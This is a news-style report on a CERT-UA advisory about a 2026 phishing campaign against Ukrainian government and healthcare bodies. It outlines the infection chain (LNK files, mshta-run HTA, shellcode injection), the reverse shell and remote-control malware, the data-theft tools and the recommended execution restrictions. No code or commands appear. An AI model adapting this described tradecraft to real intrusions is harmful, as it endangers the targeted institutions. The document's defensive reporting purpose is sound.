The Computer Emergencies Response Team of Ukraine (CERT-UA) has reported a new cyber campaign that primarily targets government bodies and municipal healthcare facilities, including clinics and emergency hospitals. This campaign, active from March to April 2026, is linked to a group identified as UAC-0247. The origins of this campaign remain unidentified, but its impact has been significant, particularly in data theft from Chromium-based web browsers and WhatsApp.
Phishing Tactics and Malware Deployment
The attack initiates through phishing emails masquerading as humanitarian aid proposals. These emails contain links that lead recipients to either compromised legitimate websites or fake sites crafted using AI technologies. The objective is to download a Windows Shortcut (LNK) file, which subsequently executes a remote HTML Application (HTA) using Windows’ “mshta.exe” utility. This HTA file serves as a distraction while a malicious binary injects shellcode into legitimate processes like “runtimeBroker.exe.”
Recent observations note the use of a two-stage loader in these attacks. The second stage involves a proprietary executable format, which supports comprehensive code functionality and uses encryption to secure the final payload. This sophisticated approach underscores the advanced nature of the threat.
Malware Tools and Network Intrusion
Among the tools used in this campaign is RAVENSHELL, a TCP reverse shell that establishes a connection with a command server to execute directives on the targeted system. Additionally, the malware AGINGFLY, developed in C#, is installed to facilitate remote control over infected systems via WebSockets. It can execute commands, operate a keylogger, and deploy further malware.
Complementing AGINGFLY, a PowerShell script called SILENTLOOP is also used. This script carries multiple functionalities, including command execution and configuration updates, and retrieves the IP address of the management server from a Telegram channel.
Tools for Data Extraction and Security Measures
The investigation into this cyber activity revealed the deployment of various open-source tools such as ChromElevator and ZAPiXDESK for extracting data from browsers and WhatsApp, respectively. Network scanning and tunneling utilities like RustScan and Ligolo-Ng were also employed to facilitate the attack’s progression.
Furthermore, evidence suggests that members of Ukraine’s Defense Forces may have been targeted through malicious ZIP archives distributed via Signal, which used DLL side-loading to drop AGINGFLY.
To mitigate this threat, CERT-UA recommends restricting the execution of LNK, HTA, and JS files, along with utilities like “mshta.exe,” “powershell.exe,” and “wscript.exe.” These measures are crucial to reducing the attack surface and preventing further exploitation.
This campaign highlights the persistent and evolving nature of cyber threats targeting critical sectors, underscoring the need for enhanced cybersecurity measures and constant vigilance.
